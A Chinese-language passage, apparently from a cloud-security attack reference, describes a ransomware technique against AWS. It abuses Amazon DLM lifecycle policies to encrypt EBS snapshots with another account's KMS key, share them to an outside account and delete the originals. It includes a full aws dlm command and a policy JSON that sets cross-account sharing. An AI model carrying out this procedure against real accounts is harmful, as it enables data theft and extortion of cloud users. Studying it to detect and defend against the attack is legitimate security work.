EC2:DescribeVolumes, DLM:CreateLifeCyclePolicy
勒索软件攻击可以通过加密尽可能多的 EBS 卷,然后删除当前的 EC2 实例、EBS 卷和快照来执行。为了自动化这一恶意活动,可以使用 Amazon DLM,使用来自另一个 AWS 账户的 KMS 密钥加密快照,并将加密的快照转移到不同的账户。或者,他们可能将未加密的快照转移到他们管理的账户,然后在那里加密它们。虽然直接加密现有的 EBS 卷或快照并不简单,但可以通过创建新的卷或快照来实现。
其次,将创建生命周期策略。此命令使用 DLM API 设置一个生命周期策略,该策略在指定时间自动对指定卷进行每日快照。它还会将特定标签应用于快照,并将卷的标签复制到快照中。policyDetails.json 文件包含生命周期策略的具体信息,例如目标标签、计划、用于加密的可选 KMS 密钥的 ARN,以及快照共享的目标账户,这些信息将记录在受害者的 CloudTrail 日志中。
aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json
{
"PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
"ResourceTypes": [
"VOLUME"
],
"TargetTags": [
{
"Key": "ExampleKey",
"Value": "ExampleValue"
}
],
"Schedules": [
{
"Name": "DailySnapshots",
"CopyTags": true,
"TagsToAdd": [
{
"Key": "SnapshotCreator",
"Value": "DLM"
}
],
"VariableTags": [
{
"Key": "CostCenter",
"Value": "Finance"
}
],
"CreateRule": {
"Interval": 24,
"IntervalUnit": "HOURS",
"Times": [
"03:00"
]
},
"RetainRule": {
"Count": 14
},
"FastRestoreRule": {
"Count": 2,
"Interval": 12,
"IntervalUnit": "HOURS"
},
"CrossRegionCopyRules": [
{
"TargetRegion": "us-west-2",
"Encrypted": true,
"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
"CopyTags": true,
"RetainRule": {
"Interval": 1,
"IntervalUnit": "DAYS"
}
}
],
"ShareRules": [
{
"TargetAccounts": [
"123456789012"
],
"UnshareInterval": 30,
"UnshareIntervalUnit": "DAYS"
}
]
}
],
"Parameters": {
"ExcludeBootVolume": false
}
}
